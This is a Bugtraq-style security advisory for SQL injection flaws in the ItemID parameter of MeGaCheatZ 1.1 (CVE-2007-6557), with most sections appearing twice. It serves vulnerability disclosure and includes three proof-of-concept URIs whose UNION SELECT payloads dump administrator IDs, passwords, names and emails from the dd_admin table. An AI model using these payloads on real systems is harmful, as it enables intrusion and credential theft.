MeGaCheatZ 'ItemID' Parameter Multiple SQL Injection Vulnerabilities
BID:26999
Info
MeGaCheatZ 'ItemID' Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 26999 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6557 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 24 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | MhZ91 is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
MeGaCheatZ MeGaCheatZ 1.1 |
| Not Vulnerable: | |
Discussion
MeGaCheatZ 'ItemID' Parameter Multiple SQL Injection Vulnerabilities
MeGaCheatZ is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect MeGaCheatZ 1.1; other versions may be vulnerable as well.
MeGaCheatZ is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect MeGaCheatZ 1.1; other versions may be vulnerable as well.
Exploit / POC
MeGaCheatZ 'ItemID' Parameter Multiple SQL Injection Vulnerabilities
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/comments.php?ItemID=-1+union+select+concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail)+from+dd_admin/* http://www.example.com/view.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10+from+dd_admin/* http://www.example.com/siteadmin/ViewItem.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_admin/*
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/comments.php?ItemID=-1+union+select+concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail)+from+dd_admin/* http://www.example.com/view.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10+from+dd_admin/* http://www.example.com/siteadmin/ViewItem.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_admin/*
Solution / Fix
MeGaCheatZ 'ItemID' Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
MeGaCheatZ 'ItemID' Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- MeGaCheatZ (MeGaCheatZ)